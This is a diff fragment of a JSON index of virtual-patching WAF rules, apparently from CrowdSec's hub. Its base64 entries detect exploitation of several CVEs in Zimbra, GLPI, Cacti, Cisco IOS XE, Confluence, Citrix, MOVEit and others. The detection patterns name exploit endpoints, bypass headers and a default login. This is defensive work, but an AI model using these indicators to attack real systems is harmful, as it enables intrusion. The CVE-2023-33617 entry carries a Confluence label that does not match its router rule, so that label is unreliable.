+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMjc5MjYKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItMjc5MjYgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3B1YmxpYy9lcnJvci5qc3AKICAgIC0gem9uZXM6CiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gZXJyQ29kZQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGxpYmluamVjdGlvblhTUwpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJaaW1icmEgQ29sbGFib3JhdGlvbiAoWkNTKSAtIENyb3NzIFNpdGUgU2NyaXB0aW5nIChDVkUtMjAyMi0yNzkyNikiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIyLTI3OTI2CiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS03OQ==",
+   "description": "Detect CVE-2022-27926 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2022-27926",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-79"
+    ],
+    "confidence": 3,
+    "label": "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2022-35914": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "6a04ea781b27eb568a1752e3e310ef59532f803fed829010fb5cf76225454bc5",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "ef4c9225bcfcc942fa5db2568a99af628cf578249b4a7477e0889f16d3ef4111",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "e1213758c850424b37cb6ff6360fc1e1a2f12af9284d77766b06ee8c58679656",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMzU5MTQKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItMzU5MTQgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3ZlbmRvci9odG1sYXdlZC9odG1sYXdlZC9odG1sYXdlZHRlc3QucGhwCgpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJHTFBJIDw9MTAuMC4yIC0gUmVtb3RlIENvbW1hbmQgRXhlY3V0aW9uIChDVkUtMjAyMi0zNTkxNCkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIyLTM1OTE0CiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS03NA==",
+   "description": "Detect CVE-2022-35914 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2022-35914",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-74"
+    ],
+    "confidence": 3,
+    "label": "GLPI \u003c=10.0.2 - Remote Command Execution (CVE-2022-35914)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2022-44877": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "3c6baf947b513098784bb4cb9d03c2e19483dd48a7660db55ee77872dd903132",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDQ4NzcKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItNDQ4NzcgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2xvZ2luL2luZGV4LnBocAogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgLSBsb2dpbgogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAiW15hLXpBLVowLTlfLi1dKyIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2VudE9TIFdlYiBQYW5lbCA3IFJDRSAoQ1ZFLTIwMjItNDQ4NzcpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyMi00NDg3NwogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtNzg=",
+   "description": "Detect CVE-2022-44877 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2022-44877",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-78"
+    ],
+    "confidence": 3,
+    "label": "CentOS Web Panel 7 RCE (CVE-2022-44877)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2022-46169": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "e251805a453d65934e5794cbb96ce34179ce20981a123103d814afdcbb788d00",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "6d2c89d06aefeacf14816f1cc755365056efcdba79265a0bb587033ca5790962",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "00ad3b04df93d2ea077b69ecfcc1156ad0262005ab9915b740f6fb0c08fe86a1",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDYxNjkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItNDYxNjkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3JlbW90ZV9hZ2VudC5waHAKICAgIC0gem9uZXM6CiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gcG9sbGVyX2lkCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IHJlZ2V4CiAgICAgICAgdmFsdWU6ICJbXmEtekEtWjAtOV9dIgoKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2FjdGkgPD0xLjIuMjIgLSBSZW1vdGUgQ29tbWFuZCBJbmplY3Rpb24gKENWRS0yMDIyLTQ2MTY5KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjItNDYxNjkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTc0CiAgIC0gY3dlLkNXRS03NwogICAtIGN3ZS5DV0UtNzgKICAgLSBjd2UuQ1dFLTg2Mw==",
+   "description": "Detect CVE-2022-46169 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2022-46169",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-74",
+     "cwe.CWE-77",
+     "cwe.CWE-78",
+     "cwe.CWE-863"
+    ],
+    "confidence": 3,
+    "label": "Cacti \u003c=1.2.22 - Remote Command Injection (CVE-2022-46169)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-20198": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml",
+   "version": "0.4",
+   "versions": {
+    "0.1": {
+     "digest": "100fe7c75a8b557d6ad35bc8712b996d9366631dda64d8a72e245293773ef2ae",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "4ed8476a931d3b45b210669ccab401d736bc765cc21ea02ed8fbddc21e6598ca",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "eedd4555f876c459d0a17950f3b1311404b44d248b789221fddf73054e429bc0",
+     "deprecated": false
+    },
+    "0.4": {
+     "digest": "4d5339081ffa687619f13b3480984e056f64cab397154c187470ef1144a5fed3",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjAxOTgKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMjAxOTggZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogLyU3N2VidWlfd3NtYV9odHRwcwogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ0lTQ08gSU9TIFhFIGFjY291bnQgY3JlYXRpb24gKENWRS0yMDIzLTIwMTk4KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMjAxOTgKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4Nw==",
+   "description": "Detect CVE-2023-20198 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-20198",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-287"
+    ],
+    "confidence": 3,
+    "label": "CISCO IOS XE account creation (CVE-2023-20198)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-22515": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "dc6fc69ee52353cef3ea5563dbccd5b73dae0924e0bf13e38550768a23eeee8c",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "bf313622a8c6b00bdaf421bb0766c1a0d077aaff8db50c32c4b1090dbbbf0fb9",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "16d7f6ff1913304df2a270b3a27ba5d1165be8e3c7978489cfb9338875bb4d42",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjI1MTUKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMjI1MTUgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3NldHVwL3NldHVwYWRtaW5pc3RyYXRvci5hY3Rpb24KICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIEhFQURFUlMKICAgICAgdmFyaWFibGVzOgogICAgICAgLSB4LWF0bGFzc2lhbi10b2tlbgogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiAibm8tY2hlY2siCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIkF0bGFzc2lhbiBDb25mbHVlbmNlIFByaXZlc2MgKENWRS0yMDIzLTIyNTE1KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMjI1MTUKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4NA==",
+   "description": "Detect CVE-2023-22515 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-22515",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-284"
+    ],
+    "confidence": 3,
+    "label": "Atlassian Confluence Privesc (CVE-2023-22515)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-24489": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "c7ec7c49ee24ba7ba855e3ae256ec2d128b51c7771d676dc150aa3cc060ca785",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjQ0ODkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMjQ0ODkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2RvY3VtZW50dW0vdXBsb2FkLmFzcHgKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgLSB1cGxvYWRpZAogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBjb250YWlucwogICAgICAgIHZhbHVlOiAiLi4iCiAgICAtIHpvbmVzOgogICAgICAtIFJBV19CT0RZCiNpdCBzZWVtcyAnUGFnZV9Mb2FkJyBpcyB0aGUgaGFuZGxlciB0aGF0IGNhbiBiZSBhYnVzZWQsIG1heWJlIHNvbWUgb3RoZXJzIGNhbj8KICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogIlBhZ2VfTG9hZCIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2l0cml4IFNoYXJlRmlsZSBSQ0UgKENWRS0yMDIzLTI0NDg5KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMjQ0ODkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4NA==",
+   "description": "Detect CVE-2023-24489 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-24489",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-284"
+    ],
+    "confidence": 3,
+    "label": "Citrix ShareFile RCE (CVE-2023-24489)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-33617": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "27d605f7f1aa991127741c047ca8c4af1e0113feafb2073fd9aa04793c311d6e",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "15df9e2f71f34f037f96f7a9b61e6cbab993f3de3708ee92cda32bec84412391",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "399c24c2222b455a5e9030ad0a31b58261e62724051655f7b98be4cdc8cc96d3",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzM2MTcKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMzM2MTcgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IHBvc3QKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2JvYWZvcm0vYWRtaW4vZm9ybWxvZ2luCiAgICAtIHpvbmVzOgogICAgICAtIEJPRFlfQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgICAtIHVzZXJuYW1lCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJhZG1pbiIKICAgIC0gem9uZXM6CiAgICAgIC0gQk9EWV9BUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gcHNkCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJwYXJrcyIKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9ib2Fmb3JtL2FkbWluL2Zvcm1waW5nCiAgICAtIHpvbmVzOgogICAgICAtIEJPRFlfQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gdGFyZ2V0X2FkZHIKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAiW15hLWYwLTk6Ll0rIgpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJBdGxhc3NpYW4gQ29uZmx1ZW5jZSBQcml2ZXNjIChDVkUtMjAyMy0zMzYxNykiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTMzNjE3CiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS03OA==",
+   "description": "Detect CVE-2023-33617 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-33617",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-78"
+    ],
+    "confidence": 3,
+    "label": "Atlassian Confluence Privesc (CVE-2023-33617)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-34362": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml",
+   "version": "0.4",
+   "versions": {
+    "0.1": {
+     "digest": "b032c0e88f383ffb1228287b53f61443eb9c91db1cd730c4e10dd42bf44d86d9",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "be808170ee4c42540423351f6d188b8cd22899810357f188d404a61f07b64dc7",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "f579f526676ecaded1b1048503b9fd738144a67b2f7f0b14d6d770c35aa98cf6",
+     "deprecated": false
+    },
+    "0.4": {
+     "digest": "1af2e304188e802a2aedc45557e41c2e6debac3d8246ec1e44d57f7d664c9677",
+     "deprecated": false
+    }
+   },
+   "content": "Cm5hbWU6IGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCmRlc2NyaXB0aW9uOiAiRGV0ZWN0IENWRS0yMDIzLTM0MzYyIGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiAvbW92ZWl0aXNhcGkvbW92ZWl0aXNhcGkuZGxsCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAtIGFjdGlvbgogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBlcXVhbHMKICAgICAgICB2YWx1ZTogbTIKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKICAgIC0gem9uZXM6CiAgICAgIC0gSEVBREVSU19OQU1FUwogICAgICB0cmFuc2Zvcm06CiAgICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICd4LXNpbG9jay10cmFuc2FjdGlvbicKICAgIC0gem9uZXM6CiAgICAgIC0gSEVBREVSU19OQU1FUwogICAgICB0cmFuc2Zvcm06CiAgICAgICAtIGxvd2VyY2FzZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAnLit4LXNpbG9jay10cmFuc2FjdGlvbicKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiTU9WRWl0IFRyYW5zZmVyIC0gUmVtb3RlIENvZGUgRXhlY3V0aW9uIChDVkUtMjAyMy0zNDM2MikiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTM0MzYyCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS04OQ==",
+   "description": "Detect CVE-2023-34362 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-34362",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-89"
+    ],
+    "confidence": 3,
+    "label": "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-3519": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "459cd434b8da480eaa0bfbbefc9806ca8c445a64757cbd339f1f7b6b32082f6f",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "57441c54adbcb8cd88ba205b1f1358dfc10c1779662efe7e9854469b986c5f54",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUxOQpkZXNjcmlwdGlvbjogIkRldGVjdCBDVkUtMjAyMy0zNTE5IGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIE1FVEhPRAogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBlcXVhbHMKICAgICAgICB2YWx1ZTogR0VUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9nd3Rlc3QvZm9ybXNzc28KICAgIC0gem9uZXM6CiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgICAtIHRhcmdldAogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbGVuZ3RoCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGd0ZQogICAgICAgIHZhbHVlOiAxMDAKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2l0cml4IFJDRSAoQ1ZFLTIwMjMtMzUxOSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTM1MTkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTk0",
+   "description": "Detect CVE-2023-3519 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-3519",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-94"
+    ],
+    "confidence": 3,
+    "label": "Citrix RCE (CVE-2023-3519)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-38205": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "d2c3666c0a337304d92b737ca02ad1aed164e31439eb6596a848688f0c27b178",
+     "deprecated": false
+    }
+   },
